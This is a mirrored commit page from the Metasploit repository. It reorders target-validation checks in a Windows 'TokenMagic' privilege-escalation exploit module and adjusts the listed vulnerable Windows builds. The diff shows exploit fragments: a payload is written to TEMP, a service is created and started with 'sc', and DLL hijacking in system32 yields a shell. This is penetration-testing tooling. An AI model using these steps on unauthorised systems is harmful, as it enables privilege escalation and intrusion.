mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-09-25 10:48:31 +02:00
Land #15223, move TokenMagic validation logic
This commit is contained in:
commit
8e4a33f2a2
@ -11,9 +11,11 @@ The module exploits the high IL gained from the "token magic" by either starting
|
||||
on a known DLL in `system32`.
|
||||
|
||||
### Installation And Setup
|
||||
Windows 10 versions 1803 is vulnerable out of the box. Token Magic works on Windows 7, 8, 8,1 and Windows 10 instances up to 1803. The DLL
|
||||
Windows 10 versions 1803 is vulnerable out of the box. Token Magic works on Windows 7sp1, 8, 8,1 and Windows 10 instances up to 1803. The DLL
|
||||
hijacking method in this module relies on a DLL that is only usable in Windows 1703 - 1803 and will not work on other
|
||||
versions. Also note the DLL method uses a trigger that can take up to ten minutes to return a shell.
|
||||
versions. Also note the DLL method uses a trigger that can take up to ten minutes to return a shell. The technique
|
||||
may work on Windows 7 sp0, but loading powershell appears to crash the session. You might be able to upload and run
|
||||
the powershell script manually after some edits to accomplish access to a Windows 7 sp0 target.
|
||||
|
||||
## Verification Steps
|
||||
1. Start msfconsole
|
||||
|
@ -139,6 +139,10 @@ minutes to trigger', 'SERVICE', ['SERVICE', 'DLL']
|
||||
writable_dir = session.sys.config.getenv('TEMP')
|
||||
end
|
||||
|
||||
# Check target
|
||||
validate_active_host
|
||||
validate_payload
|
||||
|
||||
if datastore['METHOD'] =~ /DLL/i
|
||||
bin_path = "#{writable_dir}\\WindowsCoreDeviceInfo.dll"
|
||||
payload = generate_payload_dll
|
||||
@ -156,11 +160,6 @@ minutes to trigger', 'SERVICE', ['SERVICE', 'DLL']
|
||||
cmd_args = "/c sc create #{service_name} binPath= #{bin_path} type= own start= demand && sc start #{service_name}"
|
||||
end
|
||||
|
||||
# Check target
|
||||
print_status('Checking Target')
|
||||
validate_active_host
|
||||
validate_payload
|
||||
|
||||
# Upload the payload
|
||||
print_status("Uploading payload to #{bin_path}")
|
||||
write_file(bin_path, payload)
|
||||
@ -217,11 +216,11 @@ minutes to trigger and recieve a shell.")
|
||||
vprint_status("Build Number = #{build_num}")
|
||||
if datastore['METHOD'] =~ /service/i
|
||||
# Service method has been tested on Windows 7, 8 and 10 (1803 and ealier)
|
||||
return Exploit::CheckCode::Appears if (build_num >= 7600 && build_num <= 17134)
|
||||
return Exploit::CheckCode::Appears if (build_num >= 7601 && build_num <= 17134)
|
||||
elsif (sysinfo_value =~ /10/ && build_num >= 15063 && build_num <= 17134)
|
||||
# DLL method has been tested on Windows 10 (1703 to 1803)
|
||||
return Exploit::CheckCode::Appears
|
||||
elsif (datastore['METHOD'] =~ /dll/i && build_num >= 7600 && build_num < 15063)
|
||||
elsif (datastore['METHOD'] =~ /dll/i && build_num >= 7601 && build_num < 15063)
|
||||
print_error("The current target is not vulnerable to the DLL hijacking technique. Please try setting METHOD to 'SERVICE' and then try again!")
|
||||
end
|
||||
Exploit::CheckCode::Safe
|
||||
|
Loading…
Reference in New Issue
Block a user